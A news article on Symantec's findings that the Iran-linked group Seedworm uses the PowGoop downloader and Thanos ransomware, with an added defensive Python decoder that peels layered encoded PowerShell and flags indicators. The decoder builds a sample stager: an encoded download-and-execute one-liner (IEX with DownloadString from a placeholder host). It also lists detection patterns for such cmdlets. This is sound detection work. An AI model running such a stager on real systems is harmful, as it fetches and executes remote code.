As part of its attacks on companies and government agencies across the broader Middle East, an Iranian cyberattack group has begun using new tools, including a custom downloader and commodity ransomware, according to Broadcom’s Symantec division.
Dubbed Seedworm, the group appears to be deploying several variants of a new downloader, known as PowGoop, against recent targets.
The use of the malicious program does not indicate a shift to ransomware-based cybercrime for the group, but rather the adoption of a wider range of tactics for evading defensive measures.
The downloader fetches and decrypts obfuscated PowerShell scripts and runs them on compromised systems, using this simple utility as a way to execute code.
The researchers also state that the group is deploying ransomware known as Thanos, which first appeared for sale earlier this year and appears to be used by Seedworm for its ‘destructive capacities’.
“Looking at Seedworm’s history, it is apparent they’ve been focused on Middle East-based government organizations for years,” says Vikram Thakur, Symantec’s technical director. “We don’t believe that they are directly focused on monetary gain. From our standpoint, the Thanos victim organizations [represent] very few [targets] — just a handful at the most.”
The researchers were only moderately confident, however, in attributing PowGoop to the Iranian state actor.
“Seedworm has been one of the most active Iran-linked groups in recent months, mounting apparent intelligence-gathering operations across the Middle East,” Symantec researchers stated in their analysis.
“While the connection between PowGoop and Seedworm remains tentative, it may suggest some retooling on Seedworm’s part. Any organizations that do find evidence of PowGoop on their networks should exercise extreme caution and perform a thorough investigation.”
“There is nothing sophisticated about PowGoop aside from it being custom-made and that it uses multiple layers of encoded PowerShell scripts to effectively download and execute PS-based payloads,” Thakur added later.
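The layered-encoding technique Thakur describes is something a defender will meet as a single long command line in process-creation logs. The following Python helper is an added example, not code from Symantec or from the article: it peels nested PowerShell encodings layer by layer and flags download-and-execute cmdlets in the innermost script. The two encodings it understands (`-EncodedCommand` base64 of UTF-16LE, and an inline `[Convert]::FromBase64String(...)` call) and the two-layer sample it builds are assumptions chosen for illustration; they are not a description of PowGoop's actual format, and the URL in the sample is a placeholder.

```python
import base64
import re

# Indicator name -> regex. These cmdlets and .NET calls are typical of PowerShell stagers
# that download and run a further payload; matching them is a triage signal, not proof.
INDICATORS = {
    "invoke-expression": r"Invoke-Expression|\bIEX\b",
    "downloadstring": r"DownloadString",
    "webclient": r"Net\.WebClient",
    "invoke-webrequest": r"Invoke-WebRequest|\bIWR\b",
    "frombase64": r"FromBase64String",
}

# Longest alias first so that "-EncodedCommand" is not partially matched as "-e".
ENC_FLAG_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
B64_CALL_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def decode_layer(text: str):
    """Return the script hidden inside `text`, or None if no recognised encoding is present.

    Two assumed encodings are handled:
      1. powershell.exe -EncodedCommand <base64 of UTF-16LE script>
      2. an inline [Convert]::FromBase64String('<base64 of UTF-8 script>') call
    """
    try:
        m = ENC_FLAG_RE.search(text)
        if m:
            return base64.b64decode(m.group(1)).decode("utf-16-le")
        m = B64_CALL_RE.search(text)
        if m:
            return base64.b64decode(m.group(1)).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        # Not valid base64 / not decodable text: treat as the innermost layer.
        return None
    return None


def peel_layers(text: str, max_depth: int = 10):
    """Return the list of successive layers, outermost first, stopping at max_depth."""
    layers = [text]
    current = text
    for _ in range(max_depth):
        inner = decode_layer(current)
        if inner is None:
            break
        layers.append(inner)
        current = inner
    return layers


def flag_indicators(script: str):
    """Names of INDICATORS present in `script`, sorted for stable comparison."""
    return sorted(name for name, pat in INDICATORS.items() if re.search(pat, script, re.IGNORECASE))


def analyse(command_line: str):
    """Peel all layers of a command line and summarise what the final script does."""
    layers = peel_layers(command_line)
    final = layers[-1]
    return {"depth": len(layers) - 1, "final_script": final, "indicators": flag_indicators(final)}


def build_sample_command() -> str:
    """Constructed two-layer sample of the kind this decoder is meant to peel.

    Layer 2 (innermost): a download-and-execute one-liner with a placeholder URL.
    Layer 1: that script base64-wrapped in a FromBase64String call.
    Layer 0: layer 1 passed via -EncodedCommand (base64 of UTF-16LE).
    """
    stage2 = "$c = New-Object Net.WebClient; IEX $c.DownloadString('http://example.invalid/stage2.ps1')"
    inner_b64 = base64.b64encode(stage2.encode("utf-8")).decode("ascii")
    stage1 = f"IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('{inner_b64}')))"
    outer_b64 = base64.b64encode(stage1.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -NoProfile -EncodedCommand {outer_b64}"


if __name__ == "__main__":
    result = analyse(build_sample_command())
    print("layers peeled:", result["depth"])
    print("indicators:", result["indicators"])
    print("final script:", result["final_script"])
```

In practice the command lines come from Sysmon Event ID 1 or Windows Security event 4688 with command-line auditing enabled; feeding each `powershell.exe` invocation through `analyse` and alerting when `depth` is greater than zero and `indicators` is non-empty surfaces exactly the "multiple layers of encoded PowerShell" pattern without needing a signature for any particular loader.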
PowGoop has also been identified by several other companies. Security firm Palo Alto Networks linked PowGoop to two ransomware attacks on companies in the Middle East and North Africa at the beginning of September.